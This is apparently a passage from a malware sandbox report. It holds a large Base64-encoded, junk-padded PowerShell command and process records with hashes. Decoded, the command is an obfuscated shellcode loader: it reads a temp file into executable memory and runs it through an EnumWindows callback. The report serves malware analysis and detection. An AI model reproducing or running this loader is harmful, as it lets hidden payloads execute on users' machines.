AaQBuACAATQBhAHIAbQBvAHIAIABNAGUAcgBlADEAIABTAGsAcgBrAHAAcgBvAHAAYQAgAEYAYQB0AHQAaQBnAGcAMwAgAHYAZQBhAGQAbwByAGUAbwB1ACAATgBPAE4AVgBBAFMAQwAgAHIAYQBuAGsAbABlACAAQgByAG4AZQAgAEMAbwBtAHAAIAANAAoAIwBNAGEAcwB0AGUAcgBsAGkAawBlACAAaABlAGwAaQBvAGwAbwBnAGkAIABEAG8AbABiAHkAcwB5ACAATgBFAEQARQAgAFAATwBSAFQASQBFACAAQQBuAGcAcwB0AHQAcgBzAGsAIABBAGsAdABpAG8AbgBzAGcAIABZAGQAZQByAHIANwAgAEUAVgBJAEcASABFAEQAUwBLACAAUwBQAEkATABEACAASQByAGkAdABpAGMAIABHAG4AYQB0AGgAbwBiAGQAZQAxACAAYgBsAGEAcgB0AGYAbwByAHMAIABSAGUAZgByAG4AcwA2ACAAbABlAGQAaQBnAGgAZQAgAEYAbwBkAGcAbgBnAGUAcgBuACAADQAKACMAUwBtAGUAbAB0AGUAbwBzACAARQBuAG8AcwBpAHMAZQBzACAAUwBQAEEATgBJAEUAUgAgAGEAZgB0AGUAcgB0AGEAeABhAG0AIABNAEUAWgBaAEEATgBJAE4ARQBUACAATABHAEQATwBNAE0ARQBSAEUAIABOAGUAZABzAGwAYQBnAGUAbgAgAG0AbwBsAGUAcAByAG8AIABiAG4AcwBrAHIAaQBmAHQAZQAgAEMAdQBzAGgAaQAgAFMAaABlAHQAbABhAG4AZABzAHAAIABEAGQAbgBpAG4AZwAgAEIAZQB0AHIAawBrAGUAMQAgAEcAbwBkAG4AYQB0ACAAQwBvAG4AdgBpAHYAaQBhADUAIABTAHAAaQByAGEAbAB0AGEAYQBnACAAcwBhAHgAYwBvAHIAbgBlAHQAIABCAGEAZwBlAHAAIABMAE8AVgBLAEEAVAAgAGEAaQByAGIAdQAgAE4AbgBzAG8AbQA0ACAAQgBsAG8AZABwAHIAbwBwADkAIABSAEgATwBQAEEATABPAEMARQBSACAAZQBuAGMAaABhAHMAZQByACAADQAKACMAdgBvAGwAZAB0AGcAdAAgAFUARABTAEwAQQBHAEcASQBWACAAQgBhAGwAYQBuACAAQQBrAHQAaQB2AGkAdAA0ACAARQBLAFMAUABPAFMASQBUAEkATwAgAHMAdABhAG0AbQBlACAATQB5AHQAaABvAGwAbwA4ACAAVABIAFIATwBUAFQATABFAFIAIABWAGkAbgBkAHUAZQAgAFYAQQBTAEUAUgBIAFUAIABiAGwAbwBkAHMAawB1ACAAaABvAG0AbwBuAHkAbQB5AHUAIABVAFIAUwBLAE8AVgAgAFQAYQBhAGwAbQBvAGQAOAAgAFUASABJAE4ARAAgAFAAUgBPAEQAVQBLAFQASABBACAAVQBNAE8AUgBBAEwARQBOAEQASQAgAEYATwBSAE0AQQAgAEIAbABlAHMAYgA5ACAARwB5AHAAdABlAHIAZQBzAG8ANAAgAEQAYQB0AGEAYgAgAE4AbwByAG0AZQByAGkANwAgAEEAYwBjAGUAcwBzAGkAbwBuADUAIABIAEUATgBTAFkAIABhAG4AdABlAGcAbgBkACAAUABoAHIAZQBuADQAIABQAFIASQBNAEEAVABBAEwAIABOAG8AdABpAGMAZQBzAHMAdAA2ACAATQBPAEQARQBSAEwASQAgAGwAbQByAGsAZQByAHMAdQBsACAARgBJAE4ARwBFAFIAIAANAAoAIwBBAG4AdABpAGMAbwAgAFQAUgBPAEwARABFAFMASwBPACAATABPAFYATQBTAFMASQAgAE8AbQBsAGEAcwB0AG4AaQBuAGcANAAgAHYAYQB3AGEAbgB0AGkAZAB5AHMAIABrAG4AZQBiAGwAaQBuAGcAIABmAG8AcgBzAHQAcgBhAG4AZAAgAFQAaQBlAHQAaQBjAGsAbgBhAGEANgAgAGYAbABsAGUAcwBmAGEAZwBzACAAVABhAG4AZwBsAG8AIABTAHYAZQBuADIAIABQAHIAbwBqADQAIABDAE8AQwBLAFQAQQBJAEwAUwAgAFkAZQBsAGwAbwB3AHIAIAANAAoAIwBIAGEAbgBkAHMAIABTAFkARABTACAAUwBpAG4AaQBjAGkAMQAgAGMAZQBuAHQAIABkAG8AbQBuAGUAcwB0AHIAIABEAGUAbQBvACAAUwBDAFIASQAgAEMASABBAFIAQwBVACAAUwBvAG4AZwBmAHUANgAgAA0ACgAjAEIAQQBVAFMAIABTAFQAUgBBAEYARgAgAEQAdQB0AHQAbwBuAGsAcgBhAG4AIABMAEEASwBTACAAUwBjAHIAZQBlAG4AaQAgAFAAUgBPAEQAVQBLAFQASQBWACAAVwBhAGwAawBhAGIAbwB1AHQAbwAyACAAdABvAGcAdgBvAGcAbgB1ACAASQBuAGMAbwAyACAADQAKACMAYQBuAGsAcgAgAEcAcgB1AHAAcABlACAAYgBpAGwAbABlAHQAdAAgAFQAcgBvAGwAaQBnAHMAIABsAGEAbQBwAGUAcwBrAHIAbQAgAFMAQQBMAEcAUwBDAEgAQQBVAEYAIABCAEUAUwBWAEkATQBFAEIAQQAgAFMAcABlAGUAZABvAG0AZQB0ADcAIABBAEYARgBJACAAUwB5AGcAZQBoAGoAbABwADIAIABWAG8AawBzAGUAbgBkACAAQQBmAGgAbwBwAG4AMQAgAGMAbwBsAGUAYQBkAGUAcgBkACAASgBPAFQAVABJAE4AIABSAG8AdQBzAHQAZABvADcAIABmAG8AcgBzAHQAbwBrACAAdAByAGUAZABqAGUAdgBlACAAUwBwAG8AbABlAHIAZQByAGwAIABhAHIAYgBvAHUAcgBpAHMAIAANAAoAIwBLAGgAYQB0AHMAZgAgAEwASQBOAEQAQQBCAFIAIABCAE8AQwBDACAAVABpAG4AawB0AHUAcgBlAHIAMgAgAEIAZQB6AGEAbgB0AHkAdAA2ACAAZgBqAG8AcgAgAHUAZAB0AHIAeQBrAHMAbQBpAGQAIABzAGEAdQBiAGEAYgBsAGUAbgAgAHMAcABlAGUAZAAgAEQAbwBtAG0AZQBuADcAIAANAAoAIwBEAGkAcwBpAG4AOQAgAFAAUgBPAEwATwBOAEcARQBTAEMAIABBAGIAdABlADEAIABTAGEAbABpAGMAeQAzACAARABFAEkASwBTAEkAIABHAFkATgBHAEUAIAB0AGgAbABpAHAAcwBpAHMAcAAgAEMAaQBsAGkAbwBsACAAaQBuAGYAbwAgAFAAYQBsAGEAZQBvAHIAMwAgAEEAZgBmAGkAMwAgAE0ARQBMAE8AIABEAEkAQgBBAFMASQBDAEkAVABZACAASwBvAG4AYwBlAHIAMQAgAFAAbABvAHUAZwBoAHcAcgBpAGcAIABDAE8AUgBPAE4AQQBHACAAQQBmAHQAYQAgAFMAbwBpAGcAbgA1ACAAUwBuAGkAZgBmACAARABpAHMAZABvACAATABPAEMAUgAgAE0ARQBMAEwARQBNAE0AQQBEACAADQAKACMAUwB2AG8AdgBsADcAIAB1AGQAZwBpAGYAdABzACAATABpAG4AZABlAG4AcABhAGwAYQAxACAAdQBuAGQAZQAgAFUAbgBtAGkAcwAyACAAUwB0AGkAYwBrAGYAYQBzAHQAbgAgAGQAZQBzAHQAcgAgAFUAbgBzAGkAbgBlAHcAaQA2ACAAVwBvAG4AbgBpAG4AZwA5ACAATQBlAGwAbABlAG0AdABpAG4AIABzAGsAeQBkAGUAcgBpACAARwBBAEIARgBFAFMAVABTAFYASQAgAFQASQBMAEcAQQBBACAATwBwAGUAcgAgAEIAdQB0AGkAawBzAGcAYQAgAFQAdQBtAGwAaQBuAGcAIABNAG8AcgBhAG4AbgA0ACAAbwBwAHQAYQBsAHQAZQBzACAAaQBjAGsAZQAgAA0ACgAjAFMAdABhAGIAZQBqAHMAZQByACAAUwBQAFIASQBOACAAQQBtAGIAbAB5AGcAbwBuACAAcABvAHIAdAByAGUAcgBzACAATwByAGQAZABhAG4AbgBlACAAZgBvAG4AZABsACAAUwB0AGEAdAB1ACAARAByAGkAdgBoAGoAdQBsAGUAOAAgAGIAYQByAGIAZQB0ACAAVABSAEEAUABOAEUAIABzAHUAYgBjACAAUwB0AHIAZwBnAGEAcgBuACAARgBvAHIAbQAgAEYAUgBBAEcAQQAgAEQAUwBMAEUAUgAgAEUAUgBHAE8AUwBUAEEAIAANAAoAIwBjAG8AbgB2AGUAeQBhACAAcgBlAGMAaQByAGMAbABpAG4AZwAgAGIAYQBnAGYAbABpAGsAbgBpAG4AIABVAG4AcgBvAHUAbgBkAHMAbAAgAG4AYQBiAG8AYgBlAGIAIABCAG8AcgBlAHQAYQBhAHIAbgAgAFAAYQByAGEAbgBvAGkAZAAgAEEAZgBnAHIAZQBsAHMAZQBzAGYAIABOAG8AbgBjAGUAbABsAHUAbAA2ACAASwBvAHIAcgBlAGsAdABpACAAZAB1AG0AbQBlAHMAdABlACAAQQBnAHIAYQAgAEMATABJAE4ASQBDAFMAQQBHACAATQBpAGwAagAgAE0AYQBsAHQAbgBpACAATwBMAEYAQQBDAFQATwAgAEYAYQBnAGsAcgBpAHQAaQBrACAARgBhAHMAYQBuAGgAYQBuADkAIABTAFAASQBEAFMASwBBAEEATAAgAEwAdQByAGUANwAgAEwAYQBkAG4AaQAgAE8AVgBFAFIAUgBLACAATABZAEMAVQBTAFQAIAANAAoADQAKAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAGQAbwB0AHIAaQBhAGMAbwBuADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGcAZABpADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0ARgBvAG4AdABzAEEAKABzAHQAcgBpAG4AZwAgAEEAcgB0AGgAcgBvAGMAbAA5ACwAdQBpAG4AdAAgAGEAcgByAGEAeQAsAGkAbgB0ACAARgBJAEYAVQBMAFIARABFAEkALABpAG4AdAAgAGQAbwB0AHIAaQBhAGMAbwBuADAALABpAG4AdAAgAFMASwBSAE8AVABQAFIALABpAG4AdAAgAEMAYQBzAHMAaQBkAGkAZAAsAGkAbgB0ACAAVQBuAGEAbgBuAGUAYQBsAGUANQApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAEsARQBSAE4ARQBMADMAMgAiACwAIABFAG4AdAByAHkAUABvAGkAbgB0AD0AIgBDAHIAZQBhAHQAZQBGAGkAbABlAEEAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAYQBjACgAWwBNAGEAcgBzAGgAYQBsAEEAcwAoAFUAbgBtAGEAbgBhAGcAZQBkAFQAeQBwAGUALgBMAFAAUwB0AHIAKQBdAHMAdAByAGkAbgBnACAAQQByAHQAaAByAG8AYwBsADkALAB1AGkAbgB0ACAAYQByAHIAYQB5ACwAaQBuAHQAIABGAEkARgBVAEwAUgBEAEUASQAsAGkAbgB0ACAAZABvAHQAcgBpAGEAYwBvAG4AMAAsAGkAbgB0ACAAUwBLAFIATwBUAFAAUgAsAGkAbgB0ACAAQwBhAHMAcwBpAGQAaQBkACwAaQBuAHQAIABVAG4AYQBuAG4AZQBhAGwAZQA1ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABkAG8AdAByAGkAYQBjAG8AbgA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABPAGMAZQBhAG4AbwBsAG8ANgAsAGkAbgB0ACAATQByAGsAbABnACwAcgBlAGYAIABJAG4AdAAzADIAIABkAG8AdAByAGkAYQBjAG8AbgAsAGkAbgB0ACAARABFAEMASQBQAEgALABpAG4AdAAgAGQAbwB0AHIAaQBhAGMAbwBuADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBLAEUAUgBOAEUATAAzADIAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIAUgBlAGEAZABGAGkAbABlACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAQwBEAEEAQwAoAGkAbgB0ACAATQByAGsAbABnADAALAB1AGkAbgB0ACAATQByAGsAbABnADEALABJAG4AdABQAHQAcgAgAE0AcgBrAGwAZwAyACwAcgBlAGYAIABJAG4AdAAzADIAIABNAHIAawBsAGcAMwAsAGkAbgB0ACAATQByAGsAbABnADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBVAFMARQBSADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0AVwBpAG4AZABvAHcAcwAoAEkAbgB0AFAAdAByACAATQByAGsAbABnADUALABpAG4AdAAgAE0AcgBrAGwAZwA2ACkAOwANAAoADQAKAH0ADQAKACIAQAANAAoAIwBNAGkAYQBzAG0AIABQAHMAZQB1AGQAbwBzADkAIABLAG8AbgBkAG8AbABlAG4AYwA4ACAAcgBlAHAAcgBvACAASQBuAHQAZQBnADUAIABTAGsAdQBtAHIAOAAgAEUAUgBHAE8ARABJAEMASQAgAEsAQQBWAEEAIAB5AG4AZABpAGcAZQByACAATABuAHUAZAB2AGkAawBsAGkAOQAgAGcAYQBzAGIAbwByACAAcgB1AG4AZABlAHMAYQAgAFcAZQBhAHAAIABBAEUAUgBPAEQAVQBDAFQAUwBWACAAUwB2AGkAbgBlADMAIABLAHUAbABsAGEAZwByAGUAcwA4ACAARgBvAHIAcwB0AGEAYQBlAGwANwAgAHMAaAByAHUAZwBnAGkAbgAgAEcAUgBVAFMATwBNACAAQgBhAHMAaQBzAHUAZABkAGEAbgAgAFAATgBFAFUATQAgAEQAUgBBAEEAQgBFAEkATgAgAA0ACgAkAGQAbwB0AHIAaQBhAGMAbwBuADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAFAAVABFAFIATwBTAFQASQAuAGQAYQB0ACIADQAKACMAUwB0AHIAYQBrACAAUgBlAGcAaQBzAHQAcgBhAG4AdAAgAGoAbwBnAG4AaQBuAGcAcwAgAGMAbwByAG4AdQAgAEYAYQBrAHQAdQByAGEAYgAgAEQAZQBzAGUAcgB0ADgAIABLAEEATgBEAEkAIABTAGkAZQBnAGUAZABnAGkAZgB0ADYAIABQAHIAZQBjAGkAIAB2AGUAcwBpAGMAbwAgAHYAZQBqAHIAZgBvAHIAIAANAAoAJABkAG8AdAByAGkAYQBjAG8AbgAzAD0AMAA7AA0ACgAkAGQAbwB0AHIAaQBhAGMAbwBuADkAPQAxADAANAA4ADUANwA2ADsADQAKACQAZABvAHQAcgBpAGEAYwBvAG4AOAA9AFsAZABvAHQAcgBpAGEAYwBvAG4AMQBdADoAOgBOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKAAtADEALABbAHIAZQBmAF0AJABkAG8AdAByAGkAYQBjAG8AbgAzACwAMAAsAFsAcgBlAGYAXQAkAGQAbwB0AHIAaQBhAGMAbwBuADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAIwBQAGwAZQB0ADcAIABFAGsAcwBpAGwAcgBiAG8AcgAyACAARwByAGkAbQBtACAAUAByAG8AcwBlAGMAdABpADMAIABEAEUATgBJAFoARABJAE0AIABCAHIAbQBtAGUAcgAgAEEAZAB2AG8AawBhAHQANgAgAFQAYQByAGUAMQAgAFAAYQBhAHQAYQBnAGUAIABpAG0AcABsAGUAbQAgAFUAbgBhAHMAYwBlAG4AZAA5ACAARgBpAG4AbgA4ACAAQwBPAE0AUABBAFQAIABzAGwAaQBrAG0AdQBuAGQAIABzAGkAcwBoAGEAbQAgAE0ASQBSAEEAQwBMAEUAUwBCACAAQgBlAGwAZABhAG0AcwB0AG8AcgAgAEsAaQBkAG4AYQBwADQAIABTAHUAZABzAGUAcwBwAGEAZwB1ACAAUwBBAEEATABFAEwARABFAFIARQAgAHMAdABhAHQAaQBzAHQAaQAgAEMAZQByAHYAaQBjAGkAcABsACAAUgBpAG0AZQBuAGUAMgAgAEIARQBCAE8ARQBSAEUATAAgAHQAcgBhAG4AcwBzAGsAcgAgAEwAZQB2AG4AZQBkAGUAIABpAHIAcgBlAHAAdAAgAA0ACgAkAGQAbwB0AHIAaQBhAGMAbwBuADQAPQBbAGQAbwB0AHIAaQBhAGMAbwBuADEAXQA6ADoAVgBpAGEAYwAoACQAZABvAHQAcgBpAGEAYwBvAG4AMgAsADIAMQA0ADcANAA4ADMANgA0ADgALAAxACwAMAAsADMALAAxADIAOAAsADAAKQANAAoAIwBOAE8ATgBFAEwARQAgAFIAZQBlAG0AcABoAGEAcwA4ACAARgBPAFIAQgBFAEQAIABSAEkAQwBJAE4AVQBTAEUAUwBCACAAVQBuAHMAYwBhAGIAYgBlADgAIABkAGkAYQBtAGUAdAAgAEEAbgB0AGgAcgBvAHAAbwBsAG8AIAB2AHIAdABzAGwAYQBuAGQAIABGAGEAcgB2AGUAYgBsAHkAIABBAFUAWABPAFQATwBYAFMASAAgAE4AUgBHAEEAQQBFAE4ASAAgAEQAdQBkAGUAIABSAEkARgBTAFMAVABSAEEARgBGACAAcQB1AGEAbABtACAAUwBVAEQAQQBOAEUAIABHAGUAbgBmAGQAcwBlACAASABvAHYAZQBkAGsAdQBsACAAUABJAEMAQwAgAFAARQBSAEEAQwBJAEQASQBUACAAbABpAHMAdABlACAAVgBFAFIATgBBAEwAIABPAHUAdABiAGEAbABhACAAUwB0AG8AcgAxACAAVwBlAHQAdABhACAAQwBvAGgAZQBzAGkANQAgAGgAagBlAG0AIAByAGEAZABpAG8AZQByAHMAYwBsACAAZQB4AHQAcgBhAHYAYQBzAGEAdAAgAEMAYQBsAHYAZQAgAGEAbgBoAGUAdQAgAEYATwBSAEgAQQBOAEQATAAgAA0ACgAkAGQAbwB0AHIAaQBhAGMAbwBuADUAPQAwADsADQAKACMAUwBsAHkAbgBnAHIAbwBzAGUANwAgAHYAaQBhAGoAYQBjAGEAaQBtAHAAIABCAGUAbABhAHIAaQAgAFMAcAByAGkAbgBnACAASwBlAHIAdQA5ACAAYwBhAHkAdQBjAG8AZgB5AHIAdAAgAEEARgBNAE4AUwBUAFIARQAgAEsASQBUAEMASAAgAFMAcABvAG4AZwBpAG8AcABsAGEANAAgAE8AdgBlAHIAbAAgAGYAbwB1AGUAdAB0AGUAZQBoAGEAIABYAEkAUABIAE8AIABQAG8AbABsAGIAbwBvAGsAdwA5ACAARgByAG8AcwB0AGsAIABQAEgATwBTAFAASABPAEwASQAgAHMAYQBuAGcAZQBsAG4AYQAgAGsAbwBsAGkAYgByACAARgBsAHkAdgBlAGcAcgAgAGIAdQBsAGIAZQBsAG4AZQBkACAATQBvAGQAdABhADcAIABiAGwAZQBzAGsAdQAgAEIAZQBrAGkAcwBzAGkAOAAgAFUARABUAE8ATgBJAE4ARwBFACAAZwByAGQAaQBhAGIAZQB0AGkAawAgAEEAcgBtAGEAIABQAE8ASQBOAEQAIABSAGUAawBlAHkAZQBkAGgAIABvAGIAcwBjAHUAcgBlAHIAIAANAAoAWwBkAG8AdAByAGkAYQBjAG8AbgAxAF0AOgA6AEMARABBAEMAKAAkAGQAbwB0AHIAaQBhAGMAbwBuADQALAAkAGQAbwB0AHIAaQBhAGMAbwBuADMALAA1ADgAMwA0ADYALABbAHIAZQBmAF0AJABkAG8AdAByAGkAYQBjAG8AbgA1ACwAMAApAA0ACgAjAFUAbgBpAG4AdgBlAG4AdABpACAARABEAEQAUgBVAEsASwBFAE4AIABBAHUAcgBhACAAUwB0AHIAZQBsAHQAegBpAGcAYQAgAFYAYQBsAHUAdABhAGwAYQBhACAASQByAHIAZQAxACAAaABlAHIAbABpAGcAIABCAEUAUwBQAE8AVAAgAE8AUABIAEEAVgBTAFIARQBUACAAQgByAGkAbgAgAGYAbwByAGUAcwBlAHQAdABsACAAaABhAGEAcgBkAGYAcgBvAHMAIAANAAoAWwBkAG8AdAByAGkAYQBjAG8AbgAxAF0AOgA6AEUAbgB1AG0AVwBpAG4AZABvAHcAcwAoACQAZABvAHQAcgBpAGEAYwBvAG4AMwAsACAAMAApAA0ACgANAAoA
                                    Imagebase:0x170000
                                    File size:433152 bytes
                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate

                                    Target ID:12
                                    Start time:14:02:08
                                    Start date:12/05/2022
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0xe20000
                                    File size:875008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate

                                    No disassembly